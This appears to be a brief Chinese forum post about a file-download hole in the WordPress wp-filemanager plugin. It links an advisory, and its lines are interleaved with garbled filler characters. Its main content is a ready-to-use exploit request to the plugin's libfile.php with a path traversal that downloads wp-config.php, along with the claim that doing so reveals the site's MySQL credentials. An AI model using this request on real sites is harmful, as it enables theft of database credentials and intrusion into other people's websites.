洞详解:http://packetstormsecurity.com/f ... -File-Download.html
5 o1 T) r7 M- Y6 n \% H9 r9 _
; Z4 ^& O# A' s$ S2 J- }1 d" R查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
% |% F7 E* E; }6 t0 K/ G |